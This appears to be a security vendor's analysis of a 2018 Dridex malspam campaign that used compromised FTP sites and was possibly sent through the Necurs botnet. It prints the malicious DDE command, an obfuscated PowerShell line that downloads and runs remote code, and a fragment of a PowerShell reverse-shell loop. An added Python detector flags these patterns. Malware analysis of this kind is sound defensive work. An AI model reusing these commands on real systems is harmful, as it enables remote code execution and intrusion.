
Forcepoint Security Labs have recently observed a peculiar email campaign distributing a variant of the Dridex banking trojan. The campaign used compromised FTP sites instead of the more usual HTTP link as download locations for malicious documents, exposing the credentials of the compromised FTP sites in the process.

The malicious emails were distributed just before 12:00 UTC on 17 January 2018 and remained active for approximately seven hours. The emails were sent primarily to .COM top-level domains (TLDs), with the second, third and fourth most affected TLDs suggesting that the major regional targets were France, the UK, and Australia respectively:

The sender domains used were observed to belong to compromised accounts. The sender names rotated through the following names, perhaps to make the emails look more convincing to unsuspecting recipients:


Below is a sample malicious email:

The campaign used two types of documents. The first is a DOC that abuses DDE to execute the following shell command to download malware:

c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('https://185.176.221[.]146/download/s/GTz')

The above link downloads a B64 encoded string that decodes to the following download code:

while (1 -eq 1)
     $ErrorActionPreference = 'Continue';
     $zcl=New-Object Net.Sockets.TCPClient("",443);
     while(($i=$zm.Read($bt,0,$bt.Length)) -ne 0)
       $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
       $st= ([text.encoding]::ASCII).GetBytes((iex $d 2>&1));
     Start-Sleep -s 10;
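The DDE command line above splits "powershell.exe" with cmd.exe caret escapes, which defeats a plain substring match in process-creation logs. The following is an added detection example, not code from the original post: it normalizes the command line before checking for the switches seen in this campaign. The function names, indicator labels and the benign sample are assumptions made for illustration.

```python
import re

# Command line from the article (URL left defanged, as published).
PAGE_CMD = (r"c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && "
            r"pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c "
            r"IEX(New-Object Net.WebClient).DownloadString"
            r"('https://185.176.221[.]146/download/s/GTz')")
# Constructed benign sample for comparison.
BENIGN_CMD = r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"

# "-name value" pairs; a following token that starts with "-" is not a value.
PARAM = re.compile(r"(?<=\s)-([a-z]+)(?:\s+([^\s-]\S*))?")


def naive_match(cmdline):
    """Substring check that the caret escapes defeat."""
    return "powershell" in cmdline.lower()


def has_param(params, names, value):
    """PowerShell accepts any unambiguous prefix of a parameter name."""
    return any(v == value and any(full.startswith(n) for full in names)
               for n, v in params)


def analyze(cmdline):
    """Return the indicators found in one process command line."""
    # cmd.exe drops unquoted ^ escapes before it starts the child process.
    # Simplification: carets inside double quotes are stripped here too.
    norm = re.sub(r"\s+", " ", cmdline.replace("^", "")).lower()
    if not re.search(r"\bpowershell(\.exe)?\b", norm):
        return []
    params = PARAM.findall(norm)
    hits = []
    if "^" in cmdline:
        hits.append("caret-obfuscation")
    if has_param(params, ("windowstyle",), "hidden"):
        hits.append("hidden-window")
    if has_param(params, ("executionpolicy", "ep"), "bypass"):
        hits.append("execpolicy-bypass")
    if re.search(r"\biex\b|invoke-expression", norm) and "downloadstring" in norm:
        hits.append("download-and-execute")
    return hits


if __name__ == "__main__":
    for sample in (PAGE_CMD, BENIGN_CMD):
        print(naive_match(sample), analyze(sample))
```
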

The second type is an XLS file with a macro that downloads Dridex from the following location:


It is then executed using the following command:

cmd.exe /c START "" C:\Users\<redacted>\AppData\Local\Temp\vanilaice8.exe


The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way.

The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable. Equally, if a compromised site is used by multiple actors it also makes attribution harder for security professionals and law enforcement.

Multiple attributes of the campaign suggest that it may be coming from the Necurs botnet:

  • The domains used for distribution were already in our records as compromised domains used in previous Necurs campaigns;
  • Necurs is historically known to spread Dridex;
  • The document downloaders are also similar to those used by Necurs in the past;
  • The download locations of the XLS file also follow the traditional Necurs format.

However, the volume of this particular campaign is very low compared to typical Necurs campaigns. Necurs typically sends out millions of emails per campaign, while this campaign was recorded sending just over 9.5K emails in total. Necurs has recently been recorded using malicious links (as opposed to malicious attachments) to distribute Dridex, but the switch to FTP-based download URLs is an unexpected change.


Forcepoint customers are protected against this threat at the following stages of attack:

Stage 2 (Lure) – Malicious e-mails associated with this attack are identified and blocked.
Stage 5 (Dropper File) – Malicious files are prevented from being downloaded.
Stage 6 (Call Home) – Attempts by Dridex to contact its C&C server are blocked.


Cybercriminals constantly update their attack methods to try to ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to avoid detection by email gateways and network policies that may consider FTP sites to be trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords: a compromised account may be abused multiple times by different actors as long as the credentials remain the same.

Although there are attributes of the campaign that suggest it is coming from Necurs, the size of the campaign is more or less ‘average’. Given Necurs’ typical association with very large campaigns, the reason for this remains something of a mystery.